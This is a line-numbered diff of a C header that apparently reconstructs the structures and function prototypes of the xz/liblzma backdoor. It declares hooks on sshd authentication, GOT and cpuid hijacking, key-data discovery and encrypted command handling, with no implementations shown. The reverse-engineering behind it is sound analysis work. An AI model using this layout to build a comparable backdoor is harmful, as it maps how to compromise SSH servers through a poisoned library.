2095  void *mem_address
-
2096 );
-
2097 
-
2107 extern BOOL find_add_instruction_with_mem_operand(
-
2108  u8 *code_start,
-
2109  u8 *code_end,
-
2110  dasm_ctx_t *dctx,
-
2111  void *mem_address
-
2112 );
-
2113 
-
2124 extern BOOL find_mov_lea_instruction(
-
2125  u8 *code_start,
-
2126  u8 *code_end,
-
2127  BOOL is_64bit_operand,
-
2128  BOOL load_flag,
-
2129  dasm_ctx_t *dctx
-
2130 );
-
2131 
-
2147 extern BOOL find_mov_instruction(
-
2148  u8 *code_start,
-
2149  u8 *code_end,
-
2150  BOOL is_64bit_operand,
-
2151  BOOL load_flag,
-
2152  dasm_ctx_t *dctx
-
2153 );
-
2154 
-
2165 extern BOOL find_instruction_with_mem_operand_ex(
-
2166  u8 *code_start,
-
2167  u8 *code_end,
-
2168  dasm_ctx_t *dctx,
-
2169  int opcode,
-
2170  void *mem_address
-
2171 );
-
2172 
-
2189 extern BOOL is_endbr64_instruction(u8 *code_start, u8 *code_end, u32 low_mask_part);
-
2190 
-
2199 extern u8 *find_string_reference(
-
2200  u8 *code_start,
-
2201  u8 *code_end,
-
2202  const char *str
-
2203 );
-
2204 
-
2214 extern u8 *elf_find_string_reference(
-
2215  elf_info_t *elf_info,
-
2216  EncodedStringId encoded_string_id,
-
2217  u8 *code_start,
-
2218  u8 *code_end
-
2219 );
-
2220 
-
2240 extern BOOL find_reg2reg_instruction(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx);
-
2241 
-
2251 extern BOOL find_function_prologue(u8 *code_start, u8 *code_end, u8 **output, FuncFindType find_mode);
+
1948 
+
1949 typedef struct __attribute__((packed)) backdoor_cpuid_reloc_consts {
+
1955  ptrdiff_t cpuid_random_symbol_got_offset;
+
1961  u64 cpuid_got_index;
+
1967  ptrdiff_t backdoor_init_stage2_got_offset;
+
1968 } backdoor_cpuid_reloc_consts_t;
+
1969 
+
1970 assert_offset(backdoor_cpuid_reloc_consts_t, cpuid_random_symbol_got_offset, 0);
+
1971 assert_offset(backdoor_cpuid_reloc_consts_t, cpuid_got_index, 0x8);
+
1972 assert_offset(backdoor_cpuid_reloc_consts_t, backdoor_init_stage2_got_offset, 0x10);
+
1973 static_assert(sizeof(backdoor_cpuid_reloc_consts_t) == 0x18);
+
1974 
+
1975 typedef struct __attribute__((packed)) backdoor_tls_get_addr_reloc_consts {
+
1981  ptrdiff_t tls_get_addr_plt_offset;
+
1987  ptrdiff_t tls_get_addr_random_symbol_got_offset;
+
1988 } backdoor_tls_get_addr_reloc_consts_t;
+
1989 
+
1990 assert_offset(backdoor_tls_get_addr_reloc_consts_t, tls_get_addr_plt_offset, 0);
+
1991 assert_offset(backdoor_tls_get_addr_reloc_consts_t, tls_get_addr_random_symbol_got_offset, 0x8);
+
1992 static_assert(sizeof(backdoor_tls_get_addr_reloc_consts_t) == 0x10);
+
1993 
+
1994 typedef struct __attribute__((packed)) elf_functions {
+
1995  PADDING(sizeof(u64));
+
2001  int (*init_hook_functions)(backdoor_hooks_ctx_t *funcs);
+
2002  PADDING(sizeof(u64));
+
2003  PADDING(sizeof(u64));
+
2009  void *(*elf_symbol_get_addr)(elf_info_t *elf_info, EncodedStringId encoded_string_id);
+
2010  PADDING(sizeof(u64));
+
2016  BOOL (*elf_parse)(Elf64_Ehdr *ehdr, elf_info_t *elf_info);
+
2017 } elf_functions_t;
+
2018 
+
2019 assert_offset(elf_functions_t, init_hook_functions, 0x8);
+
2020 assert_offset(elf_functions_t, elf_symbol_get_addr, 0x20);
+
2021 assert_offset(elf_functions_t, elf_parse, 0x30);
+
2022 static_assert(sizeof(elf_functions_t) == 0x38);
+
2023 
+
2024 typedef struct __attribute__((packed)) fake_lzma_allocator {
+
2025  PADDING(sizeof(u64));
+
2026  lzma_allocator allocator;
+
2027 } fake_lzma_allocator_t;
+
2028 
+
2029 assert_offset(fake_lzma_allocator_t, allocator.alloc, 0x8);
+
2030 assert_offset(fake_lzma_allocator_t, allocator.free, 0x10);
+
2031 assert_offset(fake_lzma_allocator_t, allocator.opaque, 0x18);
+
2032 static_assert(sizeof(fake_lzma_allocator_t) == 0x20);
+
2033 
+
2034 typedef struct __attribute__((packed)) instruction_search_ctx
+
2035 {
+
2040  u8 *start_addr;
+
2045  u8 *end_addr;
+
2050  u8 *offset_to_match;
+
2055  u32 *output_register_to_match;
+
2056  u8 *output_register; // TODO unknown
+
2061  BOOL result;
+
2062  PADDING(0x4);
+
2063  backdoor_hooks_data_t *hooks;
+
2064  imported_funcs_t *imported_funcs;
+
2065 } instruction_search_ctx_t;
+
2066 
+
2067 assert_offset(instruction_search_ctx_t, start_addr, 0);
+
2068 assert_offset(instruction_search_ctx_t, end_addr, 0x8);
+
2069 assert_offset(instruction_search_ctx_t, offset_to_match, 0x10);
+
2070 assert_offset(instruction_search_ctx_t, output_register_to_match, 0x18);
+
2071 assert_offset(instruction_search_ctx_t, output_register, 0x20);
+
2072 assert_offset(instruction_search_ctx_t, result, 0x28);
+
2073 assert_offset(instruction_search_ctx_t, hooks, 0x30);
+
2074 assert_offset(instruction_search_ctx_t, imported_funcs, 0x38);
+
2075 static_assert(sizeof(instruction_search_ctx_t) == 0x40);
+
2076 
+
2077 
+
2095 extern BOOL sshd_proxy_elevate(monitor_data_t *args, global_context_t *ctx);
+
2096 
+
2105 extern BOOL x86_dasm(dasm_ctx_t *ctx, u8 *code_start, u8 *code_end);
+
2106 
+
2116 extern BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx);
+
2117 
+
2126 extern BOOL find_lea_instruction(u8 *code_start, u8 *code_end, u64 displacement);
+
2127 
+
2137 extern BOOL find_instruction_with_mem_operand(
+
2138  u8 *code_start,
+
2139  u8 *code_end,
+
2140  dasm_ctx_t *dctx,
+
2141  void *mem_address
+
2142 );
+
2143 
+
2153 extern BOOL find_lea_instruction_with_mem_operand(
+
2154  u8 *code_start,
+
2155  u8 *code_end,
+
2156  dasm_ctx_t *dctx,
+
2157  void *mem_address
+
2158 );
+
2159 
+
2169 extern BOOL find_add_instruction_with_mem_operand(
+
2170  u8 *code_start,
+
2171  u8 *code_end,
+
2172  dasm_ctx_t *dctx,
+
2173  void *mem_address
+
2174 );
+
2175 
+
2186 extern BOOL find_mov_lea_instruction(
+
2187  u8 *code_start,
+
2188  u8 *code_end,
+
2189  BOOL is_64bit_operand,
+
2190  BOOL load_flag,
+
2191  dasm_ctx_t *dctx
+
2192 );
+
2193 
+
2209 extern BOOL find_mov_instruction(
+
2210  u8 *code_start,
+
2211  u8 *code_end,
+
2212  BOOL is_64bit_operand,
+
2213  BOOL load_flag,
+
2214  dasm_ctx_t *dctx
+
2215 );
+
2216 
+
2227 extern BOOL find_instruction_with_mem_operand_ex(
+
2228  u8 *code_start,
+
2229  u8 *code_end,
+
2230  dasm_ctx_t *dctx,
+
2231  int opcode,
+
2232  void *mem_address
+
2233 );
+
2234 
+
2251 extern BOOL is_endbr64_instruction(u8 *code_start, u8 *code_end, u32 low_mask_part);
2252 
-
2264 extern BOOL find_function(
-
2265  u8 *code_start,
-
2266  void **func_start,
-
2267  void **func_end,
-
2268  u8 *search_base,
-
2269  u8 *code_end,
-
2270  FuncFindType find_mode);
-
2271 
-
2282 extern BOOL elf_contains_vaddr(elf_info_t *elf_info, void *vaddr, u64 size, u32 p_flags);
-
2283 
-
2294 extern BOOL elf_contains_vaddr_relro(elf_info_t *elf_info, u64 vaddr, u64 size, u32 p_flags);
-
2295 
-
2303 extern BOOL elf_parse(Elf64_Ehdr *ehdr, elf_info_t *elf_info);
-
2304 
-
2312 extern BOOL is_gnu_relro(Elf64_Word p_type, u32 addend);
-
2313 
-
2327 extern BOOL main_elf_parse(main_elf_t *main_elf);
-
2328 
-
2329 extern char *check_argument(char arg_first_char, char* arg_name);
-
2330 
-
2359 extern BOOL process_is_sshd(elf_info_t *elf, u8 *stack_end);
-
2360 
-
2368 extern BOOL elf_find_string_references(elf_info_t *elf_info, string_references_t *refs);
-
2369 
-
2378 extern Elf64_Sym *elf_symbol_get(elf_info_t *elf_info, EncodedStringId encoded_string_id, EncodedStringId sym_version);
-
2379 
-
2387 extern void *elf_symbol_get_addr(elf_info_t *elf_info, EncodedStringId encoded_string_id);
-
2388 
-
2396 extern void *elf_get_code_segment(elf_info_t *elf_info, u64 *pSize);
-
2397 
-
2406 extern void *elf_get_rodata_segment(elf_info_t *elf_info, u64 *pSize);
-
2407 
-
2424 extern void *elf_get_data_segment(elf_info_t *elf_info, u64 *pSize, BOOL get_alignment);
-
2425 
-
2437 extern void *elf_get_reloc_symbol(
-
2438  elf_info_t *elf_info,
-
2439  Elf64_Rela *relocs,
-
2440  u32 num_relocs,
-
2441  u64 reloc_type,
-
2442  EncodedStringId encoded_string_id);
-
2443 
-
2451 extern void *elf_get_plt_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id);
-
2452 
-
2460 extern void *elf_get_got_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id);
-
2461 
-
2475 extern BOOL elf_find_function_pointer(
-
2476  StringXrefId xref_id,
-
2477  void **pOutCodeStart, void **pOutCodeEnd,
-
2478  void **pOutFptrAddr, elf_info_t *elf_info,
-
2479  string_references_t *xrefs,
-
2480  global_context_t *ctx);
-
2481 
-
2494 extern char *elf_find_string(
-
2495  elf_info_t *elf_info,
-
2496  EncodedStringId *stringId_inOut,
-
2497  void *rodata_start_ptr);
-
2498 
-
2505 extern lzma_allocator *get_lzma_allocator(void);
-
2506 
-
2517 extern fake_lzma_allocator_t *get_lzma_allocator_address(void);
-
2518 
-
2527 extern void *fake_lzma_alloc(void *opaque, size_t nmemb, size_t size);
-
2528 
-
2537 extern void fake_lzma_free(void *opaque, void *ptr);
-
2538 
-
2547 extern elf_functions_t *get_elf_functions_address(void);
-
2548 
-
2549 extern BOOL secret_data_append_from_instruction(dasm_ctx_t *dctx, secret_data_shift_cursor_t *cursor);
-
2550 
-
2563 extern BOOL secret_data_append_from_code(
-
2564  void *code_start,
-
2565  void *code_end,
-
2566  secret_data_shift_cursor_t shift_cursor,
-
2567  unsigned shift_count, BOOL start_from_call);
+
2261 extern u8 *find_string_reference(
+
2262  u8 *code_start,
+
2263  u8 *code_end,
+
2264  const char *str
+
2265 );
+
2266 
+
2276 extern u8 *elf_find_string_reference(
+
2277  elf_info_t *elf_info,
+
2278  EncodedStringId encoded_string_id,
+
2279  u8 *code_start,
+
2280  u8 *code_end
+
2281 );
+
2282 
+
2302 extern BOOL find_reg2reg_instruction(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx);
+
2303 
+
2313 extern BOOL find_function_prologue(u8 *code_start, u8 *code_end, u8 **output, FuncFindType find_mode);
+
2314 
+
2326 extern BOOL find_function(
+
2327  u8 *code_start,
+
2328  void **func_start,
+
2329  void **func_end,
+
2330  u8 *search_base,
+
2331  u8 *code_end,
+
2332  FuncFindType find_mode);
+
2333 
+
2344 extern BOOL elf_contains_vaddr(elf_info_t *elf_info, void *vaddr, u64 size, u32 p_flags);
+
2345 
+
2356 extern BOOL elf_contains_vaddr_relro(elf_info_t *elf_info, u64 vaddr, u64 size, u32 p_flags);
+
2357 
+
2365 extern BOOL elf_parse(Elf64_Ehdr *ehdr, elf_info_t *elf_info);
+
2366 
+
2374 extern BOOL is_gnu_relro(Elf64_Word p_type, u32 addend);
+
2375 
+
2389 extern BOOL main_elf_parse(main_elf_t *main_elf);
+
2390 
+
2391 extern char *check_argument(char arg_first_char, char* arg_name);
+
2392 
+
2421 extern BOOL process_is_sshd(elf_info_t *elf, u8 *stack_end);
+
2422 
+
2430 extern BOOL elf_find_string_references(elf_info_t *elf_info, string_references_t *refs);
+
2431 
+
2440 extern Elf64_Sym *elf_symbol_get(elf_info_t *elf_info, EncodedStringId encoded_string_id, EncodedStringId sym_version);
+
2441 
+
2449 extern void *elf_symbol_get_addr(elf_info_t *elf_info, EncodedStringId encoded_string_id);
+
2450 
+
2458 extern void *elf_get_code_segment(elf_info_t *elf_info, u64 *pSize);
+
2459 
+
2468 extern void *elf_get_rodata_segment(elf_info_t *elf_info, u64 *pSize);
+
2469 
+
2486 extern void *elf_get_data_segment(elf_info_t *elf_info, u64 *pSize, BOOL get_alignment);
+
2487 
+
2499 extern void *elf_get_reloc_symbol(
+
2500  elf_info_t *elf_info,
+
2501  Elf64_Rela *relocs,
+
2502  u32 num_relocs,
+
2503  u64 reloc_type,
+
2504  EncodedStringId encoded_string_id);
+
2505 
+
2513 extern void *elf_get_plt_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id);
+
2514 
+
2522 extern void *elf_get_got_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id);
+
2523 
+
2537 extern BOOL elf_find_function_pointer(
+
2538  StringXrefId xref_id,
+
2539  void **pOutCodeStart, void **pOutCodeEnd,
+
2540  void **pOutFptrAddr, elf_info_t *elf_info,
+
2541  string_references_t *xrefs,
+
2542  global_context_t *ctx);
+
2543 
+
2556 extern char *elf_find_string(
+
2557  elf_info_t *elf_info,
+
2558  EncodedStringId *stringId_inOut,
+
2559  void *rodata_start_ptr);
+
2560 
+
2567 extern lzma_allocator *get_lzma_allocator(void);
2568 
-
2579 extern BOOL secret_data_append_item(
-
2580  secret_data_shift_cursor_t shift_cursor,
-
2581  unsigned operation_index,
-
2582  unsigned shift_count,
-
2583  int index, u8 *code);
-
2584 
-
2593 extern BOOL secret_data_append_items(
-
2594  secret_data_item_t *items,
-
2595  u64 items_count,
-
2596  BOOL (*appender)(secret_data_shift_cursor_t, unsigned, unsigned, int, u8 *));
-
2597 
-
2608 extern BOOL secret_data_append_from_address(
-
2609  void *addr,
-
2610  secret_data_shift_cursor_t shift_cursor,
-
2611  unsigned shift_count, unsigned operation_index);
+
2579 extern fake_lzma_allocator_t *get_lzma_allocator_address(void);
+
2580 
+
2589 extern void *fake_lzma_alloc(void *opaque, size_t nmemb, size_t size);
+
2590 
+
2599 extern void fake_lzma_free(void *opaque, void *ptr);
+
2600 
+
2609 extern elf_functions_t *get_elf_functions_address(void);
+
2610 
+
2611 extern BOOL secret_data_append_from_instruction(dasm_ctx_t *dctx, secret_data_shift_cursor_t *cursor);
2612 
-
2655 extern BOOL secret_data_append_singleton(
-
2656  u8 *call_site, u8 *code,
-
2657  secret_data_shift_cursor_t shift_cursor,
-
2658  unsigned shift_count, unsigned operation_index);
+
2625 extern BOOL secret_data_append_from_code(
+
2626  void *code_start,
+
2627  void *code_end,
+
2628  secret_data_shift_cursor_t shift_cursor,
+
2629  unsigned shift_count, BOOL start_from_call);
+
2630 
+
2641 extern BOOL secret_data_append_item(
+
2642  secret_data_shift_cursor_t shift_cursor,
+
2643  unsigned operation_index,
+
2644  unsigned shift_count,
+
2645  int index, u8 *code);
+
2646 
+
2655 extern BOOL secret_data_append_items(
+
2656  secret_data_item_t *items,
+
2657  u64 items_count,
+
2658  BOOL (*appender)(secret_data_shift_cursor_t, unsigned, unsigned, int, u8 *));
2659 
-
2671 extern BOOL secret_data_append_from_call_site(
+
2670 extern BOOL secret_data_append_from_address(
+
2671  void *addr,
2672  secret_data_shift_cursor_t shift_cursor,
-
2673  unsigned shift_count, unsigned operation_index,
-
2674  BOOL bypass
-
2675 );
-
2676 
-
2696 extern BOOL backdoor_setup(backdoor_setup_params_t *params);
-
2697 
-
2703 extern void init_ldso_ctx(ldso_ctx_t *ldso_ctx);
-
2704 
-
2722 extern unsigned int backdoor_entry(unsigned int cpuid_request, u64 *caller_frame);
-
2723 
-
2735 extern void * backdoor_init(elf_entry_ctx_t *state, u64 *caller_frame);
-
2736 
-
2748 extern ptrdiff_t init_elf_entry_ctx(elf_entry_ctx_t *ctx);
-
2749 
-
2760 extern ptrdiff_t get_got_offset(elf_entry_ctx_t *ctx);
-
2761 
-
2770 extern u64 get_cpuid_got_index(elf_entry_ctx_t *ctx);
-
2771 
-
2781 extern BOOL backdoor_init_stage2(elf_entry_ctx_t *ctx, u64 *caller_frame, void **cpuid_got_addr, backdoor_cpuid_reloc_consts_t* reloc_consts);
-
2782 
-
2791 extern BOOL resolve_libc_imports(
-
2792  struct link_map *libc,
-
2793  elf_info_t *libc_info,
-
2794  libc_imports_t *imports
-
2795 );
-
2796 
-
2803 extern BOOL process_shared_libraries(backdoor_shared_libraries_data_t *data);
-
2804 
-
2812 extern BOOL process_shared_libraries_map(struct link_map *r_map, backdoor_shared_libraries_data_t *data);
-
2813 
-
2825 extern BOOL chacha_decrypt(
-
2826  u8 *in, int inl,
-
2827  u8 *key, u8 *iv,
-
2828  u8 *out, imported_funcs_t *funcs
-
2829 );
-
2830 
-
2838 extern BOOL secret_data_get_decrypted(u8 *output, global_context_t *ctx);
-
2839 
-
2848 extern BOOL is_range_mapped(u8* addr, u64 length, global_context_t* ctx);
-
2849 
-
2856 extern u32 count_bits(u64 x);
-
2857 
-
2869 extern EncodedStringId get_string_id(const char *string_begin, const char *string_end);
-
2870 
-
2910 extern unsigned int _get_cpuid_modified(unsigned int leaf, unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx, u64 *caller_frame);
+
2673  unsigned shift_count, unsigned operation_index);
+
2674 
+
2717 extern BOOL secret_data_append_singleton(
+
2718  u8 *call_site, u8 *code,
+
2719  secret_data_shift_cursor_t shift_cursor,
+
2720  unsigned shift_count, unsigned operation_index);
+
2721 
+
2733 extern BOOL secret_data_append_from_call_site(
+
2734  secret_data_shift_cursor_t shift_cursor,
+
2735  unsigned shift_count, unsigned operation_index,
+
2736  BOOL bypass
+
2737 );
+
2738 
+
2758 extern BOOL backdoor_setup(backdoor_setup_params_t *params);
+
2759 
+
2765 extern void init_ldso_ctx(ldso_ctx_t *ldso_ctx);
+
2766 
+
2784 extern unsigned int backdoor_entry(unsigned int cpuid_request, u64 *caller_frame);
+
2785 
+
2797 extern void * backdoor_init(elf_entry_ctx_t *state, u64 *caller_frame);
+
2798 
+
2810 extern ptrdiff_t init_elf_entry_ctx(elf_entry_ctx_t *ctx);
+
2811 
+
2822 extern ptrdiff_t get_got_offset(elf_entry_ctx_t *ctx);
+
2823 
+
2832 extern u64 get_cpuid_got_index(elf_entry_ctx_t *ctx);
+
2833 
+
2843 extern BOOL backdoor_init_stage2(elf_entry_ctx_t *ctx, u64 *caller_frame, void **cpuid_got_addr, backdoor_cpuid_reloc_consts_t* reloc_consts);
+
2844 
+
2853 extern BOOL resolve_libc_imports(
+
2854  struct link_map *libc,
+
2855  elf_info_t *libc_info,
+
2856  libc_imports_t *imports
+
2857 );
+
2858 
+
2865 extern BOOL process_shared_libraries(backdoor_shared_libraries_data_t *data);
+
2866 
+
2874 extern BOOL process_shared_libraries_map(struct link_map *r_map, backdoor_shared_libraries_data_t *data);
+
2875 
+
2887 extern BOOL chacha_decrypt(
+
2888  u8 *in, int inl,
+
2889  u8 *key, u8 *iv,
+
2890  u8 *out, imported_funcs_t *funcs
+
2891 );
+
2892 
+
2900 extern BOOL secret_data_get_decrypted(u8 *output, global_context_t *ctx);
+
2901 
+
2910 extern BOOL is_range_mapped(u8* addr, u64 length, global_context_t* ctx);
2911 
-
2923 extern void _cpuid_gcc(unsigned int level, unsigned int *a, unsigned int *b, unsigned int *c, unsigned int *d);
-
2924 
-
2933 extern int init_hook_functions(backdoor_hooks_ctx_t *funcs);
-
2934 
-
2953 extern void *update_got_address(elf_entry_ctx_t *entry_ctx);
-
2954 
-
2964 extern ptrdiff_t get_tls_get_addr_random_symbol_got_offset(elf_entry_ctx_t *ctx);
-
2965 
-
2966 typedef struct dl_tls_index
-
2967 {
-
2968  uint64_t ti_module;
-
2969  uint64_t ti_offset;
-
2970 } tls_index;
-
2971 
-
2979 extern void *dummy_tls_get_addr (tls_index *ti);
-
2980 
-
2992 extern uintptr_t backdoor_symbind64(
-
2993  Elf64_Sym *sym,
-
2994  unsigned int ndx,
-
2995  uptr *refcook, uptr *defcook,
-
2996  unsigned int flags,
-
2997  const char *symname);
-
2998 
-
3010 extern BOOL run_backdoor_commands(RSA *key, global_context_t *ctx, BOOL *do_orig);
-
3011 
-
3026 extern BOOL find_dl_audit_offsets(
-
3027  backdoor_data_handle_t *data,
-
3028  ptrdiff_t *libname_offset,
-
3029  backdoor_hooks_data_t *hooks,
-
3030  imported_funcs_t *imported_funcs);
-
3031 
-
3054 extern BOOL find_link_map_l_name(
-
3055  backdoor_data_handle_t *data_handle,
-
3056  ptrdiff_t *libname_offset,
-
3057  backdoor_hooks_data_t *hooks,
-
3058  imported_funcs_t *imported_funcs);
-
3059 
-
3079 extern BOOL find_dl_naudit(
-
3080  elf_info_t *dynamic_linker_elf,
-
3081  elf_info_t *libcrypto_elf,
-
3082  backdoor_hooks_data_t *hooks,
-
3083  imported_funcs_t *imported_funcs);
-
3084 
-
3101 extern BOOL find_link_map_l_audit_any_plt(
-
3102  backdoor_data_handle_t *data,
-
3103  ptrdiff_t libname_offset,
-
3104  backdoor_hooks_data_t *hooks,
-
3105  imported_funcs_t *imported_funcs);
-
3106 
-
3122 extern BOOL find_link_map_l_audit_any_plt_bitmask(
-
3123  backdoor_data_handle_t *data,
-
3124  instruction_search_ctx_t *search_ctx);
-
3125 
-
3140 extern BOOL sshd_get_sensitive_data_address_via_xcalloc(
-
3141  u8 *data_start,
-
3142  u8 *data_end,
-
3143  u8 *code_start,
-
3144  u8 *code_end,
-
3145  string_references_t *string_refs,
-
3146  void **sensitive_data_out);
-
3147 
-
3162 extern BOOL sshd_get_sensitive_data_address_via_krb5ccname(
-
3163  u8 *data_start,
-
3164  u8 *data_end,
-
3165  u8 *code_start,
-
3166  u8 *code_end,
-
3167  void **sensitive_data_out,
-
3168  elf_info_t *elf);
-
3169 
-
3179 extern int sshd_get_sensitive_data_score_in_demote_sensitive_data(
-
3180  void *sensitive_data,
-
3181  elf_info_t *elf,
-
3182  string_references_t *refs);
-
3183 
-
3193 extern int sshd_get_sensitive_data_score_in_main(
-
3194  void *sensitive_data,
-
3195  elf_info_t *elf,
-
3196  string_references_t *refs);
-
3197 
-
3207 extern int sshd_get_sensitive_data_score_in_do_child(
-
3208  void *sensitive_data,
-
3209  elf_info_t *elf,
-
3210  string_references_t *refs);
-
3211 
-
3221 extern int sshd_get_sensitive_data_score(
-
3222  void *sensitive_data,
-
3223  elf_info_t *elf,
-
3224  string_references_t *refs);
-
3225 
-
3236 extern BOOL bignum_serialize(
-
3237  u8 *buffer, u64 bufferSize,
-
3238  u64 *pOutSize,
-
3239  const BIGNUM *bn,
-
3240  imported_funcs_t *funcs);
-
3241 
-
3242 
-
3249 extern BOOL sshbuf_bignum_is_negative(struct sshbuf *buf);
-
3250 
-
3260 extern BOOL rsa_key_hash(
-
3261  const RSA *rsa,
-
3262  u8 *mdBuf,
-
3263  u64 mdBufSize,
-
3264  imported_funcs_t *funcs);
-
3265 
-
3275 extern BOOL dsa_key_hash(
-
3276  const DSA *dsa,
-
3277  u8 *mdBuf,
-
3278  u64 mdBufSize,
-
3279  global_context_t *ctx);
-
3280 
-
3291 extern BOOL sha256(
-
3292  const void *data,
-
3293  size_t count,
-
3294  u8 *mdBuf,
-
3295  u64 mdBufSize,
-
3296  imported_funcs_t *funcs);
-
3297 
-
3315 extern BOOL verify_signature(
-
3316  struct sshkey *sshkey,
-
3317  u8 *signed_data,
-
3318  u64 sshkey_digest_offset,
-
3319  u64 signed_data_size,
-
3320  u8 *signature,
-
3321  u8 *ed448_raw_key,
-
3322  global_context_t *global_ctx
-
3323 );
-
3324 
-
3336 extern BOOL sshd_patch_variables(
-
3337  BOOL skip_root_patch,
-
3338  BOOL disable_pam,
-
3339  BOOL replace_monitor_reqtype,
-
3340  int monitor_reqtype,
-
3341  global_context_t *global_ctx
-
3342 );
-
3343 
-
3352 extern BOOL sshd_find_monitor_struct(
-
3353  elf_info_t *elf,
-
3354  string_references_t *refs,
-
3355  global_context_t *ctx
-
3356 );
-
3357 
-
3358 enum SocketMode {
-
3359  DIR_WRITE = 0,
-
3360  DIR_READ = 1
-
3361 };
-
3362 
-
3375 extern BOOL sshd_get_client_socket(
-
3376  global_context_t *ctx,
-
3377  int *pSocket,
-
3378  int socket_index,
-
3379  enum SocketMode socket_direction
-
3380 );
-
3381 
-
3390 extern BOOL sshd_get_usable_socket(int *pSock, int socket_index, libc_imports_t *imports);
-
3391 
-
3400 extern BOOL sshd_get_sshbuf(struct sshbuf *sshbuf, global_context_t *ctx);
-
3401 
-
3411 extern BOOL sshd_kex_sshbuf_get(void *kex, global_context_t *ctx, void **pOutputData, size_t *pOutputSize);
-
3412 
-
3422 extern BOOL is_payload_message(
-
3423  u8 *sshbuf_data,
-
3424  size_t sshbuf_size,
-
3425  size_t *pOutPayloadSize,
-
3426  global_context_t *ctx);
-
3427 
-
3436 extern BOOL decrypt_payload_message(
-
3437  void *payload,
-
3438  size_t payload_size,
-
3439  global_context_t *ctx);
-
3440 
-
3447 extern BOOL check_backdoor_state(global_context_t *ctx);
-
3448 
-
3458 extern int mm_answer_keyallowed_hook(struct ssh *ssh, int sock, struct sshbuf *m);
-
3459 
-
3468 extern int mm_answer_keyverify_hook(struct ssh *ssh, int sock, struct sshbuf *m);
-
3469 
-
3478 extern int mm_answer_authpassword_hook(struct ssh *ssh, int sock, struct sshbuf *m);
-
3479 
-
3488 extern void mm_log_handler_hook(
-
3489  LogLevel level,
-
3490  int forced,
-
3491  const char *msg,
-
3492  void *ctx);
-
3493 
-
3503 extern ssize_t fd_read(
-
3504  int fd,
-
3505  void *buffer,
-
3506  size_t count,
-
3507  libc_imports_t *funcs);
-
3508 
-
3518 extern ssize_t fd_write(
-
3519  int fd,
-
3520  void *buffer,
-
3521  size_t count,
-
3522  libc_imports_t *funcs);
-
3523 
-
3531 extern BOOL contains_null_pointers(
-
3532  void **pointers,
-
3533  unsigned int num_pointers
-
3534 );
-
3535 
-
3544 extern BOOL count_pointers(
-
3545  void **ptrs,
-
3546  u64 *count_out,
-
3547  libc_imports_t *funcs
-
3548 );
-
3549 
-
3558 extern void sshd_log(
-
3559  sshd_log_ctx_t *log_ctx,
-
3560  LogLevel level, const char *fmt, ...);
-
3561 
-
3573 extern BOOL sshd_find_sensitive_data(
-
3574  elf_info_t *sshd,
-
3575  elf_info_t *libcrypto,
-
3576  string_references_t *refs,
-
3577  imported_funcs_t *funcs,
-
3578  global_context_t *ctx);
-
3579 
-
3586 extern u32 resolver_call_count;
-
3587 static_assert(sizeof(resolver_call_count) == 0x4);
-
3588 
-
3589 extern global_context_t *global_ctx;
-
3590 static_assert(sizeof(global_ctx) == 0x8);
-
3591 
-
3598 extern backdoor_hooks_data_t *hooks_data_addr;
-
3599 static_assert(sizeof(hooks_data_addr) == 0x8);
-
3600 
-
3611 extern const ptrdiff_t fake_lzma_allocator_offset;
-
3612 static_assert(sizeof(fake_lzma_allocator_offset) == 0x8);
-
3613 
-
3631 extern fake_lzma_allocator_t fake_lzma_allocator;
-
3632 static_assert(sizeof(fake_lzma_allocator) == 0x20);
-
3633 
-
3642 extern const ptrdiff_t elf_functions_offset;
-
3643 static_assert(sizeof(elf_functions_offset) == 0x8);
-
3644 
-
3657 extern const elf_functions_t elf_functions;
-
3658 static_assert(sizeof(elf_functions) == 0x38);
-
3659 
-
3668 extern const u64 cpuid_random_symbol;
-
3669 static_assert(sizeof(cpuid_random_symbol) == 0x8);
-
3670 
-
3679 extern const u64 tls_get_addr_random_symbol;
-
3680 static_assert(sizeof(tls_get_addr_random_symbol) == 0x8);
-
3681 
-
3690 extern const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts;
-
3691 static_assert(sizeof(cpuid_reloc_consts) == 0x18);
-
3692 
-
3701 extern const backdoor_tls_get_addr_reloc_consts_t tls_get_addr_reloc_consts;
-
3702 static_assert(sizeof(tls_get_addr_reloc_consts) == 0x10);
-
3703 
-
3712 extern const u64 string_mask_data[238];
-
3713 static_assert(sizeof(string_mask_data) == 0x770);
-
3714 
-
3723 extern const u32 string_action_data[1304];
-
3724 static_assert(sizeof(string_action_data) == 0x1460);
-
3725 
-
3726 #include "util.h"
-
3727 #endif
+
2918 extern u32 count_bits(u64 x);
+
2919 
+
2931 extern EncodedStringId get_string_id(const char *string_begin, const char *string_end);
+
2932 
+
2972 extern unsigned int _get_cpuid_modified(unsigned int leaf, unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx, u64 *caller_frame);
+
2973 
+
2985 extern void _cpuid_gcc(unsigned int level, unsigned int *a, unsigned int *b, unsigned int *c, unsigned int *d);
+
2986 
+
2995 extern int init_hook_functions(backdoor_hooks_ctx_t *funcs);
+
2996 
+
3015 extern void *update_got_address(elf_entry_ctx_t *entry_ctx);
+
3016 
+
3026 extern ptrdiff_t get_tls_get_addr_random_symbol_got_offset(elf_entry_ctx_t *ctx);
+
3027 
+
3028 typedef struct dl_tls_index
+
3029 {
+
3030  uint64_t ti_module;
+
3031  uint64_t ti_offset;
+
3032 } tls_index;
+
3033 
+
3041 extern void *dummy_tls_get_addr (tls_index *ti);
+
3042 
+
3054 extern uintptr_t backdoor_symbind64(
+
3055  Elf64_Sym *sym,
+
3056  unsigned int ndx,
+
3057  uptr *refcook, uptr *defcook,
+
3058  unsigned int flags,
+
3059  const char *symname);
+
3060 
+
3072 extern BOOL run_backdoor_commands(RSA *key, global_context_t *ctx, BOOL *do_orig);
+
3073 
+
3088 extern BOOL find_dl_audit_offsets(
+
3089  backdoor_data_handle_t *data,
+
3090  ptrdiff_t *libname_offset,
+
3091  backdoor_hooks_data_t *hooks,
+
3092  imported_funcs_t *imported_funcs);
+
3093 
+
3116 extern BOOL find_link_map_l_name(
+
3117  backdoor_data_handle_t *data_handle,
+
3118  ptrdiff_t *libname_offset,
+
3119  backdoor_hooks_data_t *hooks,
+
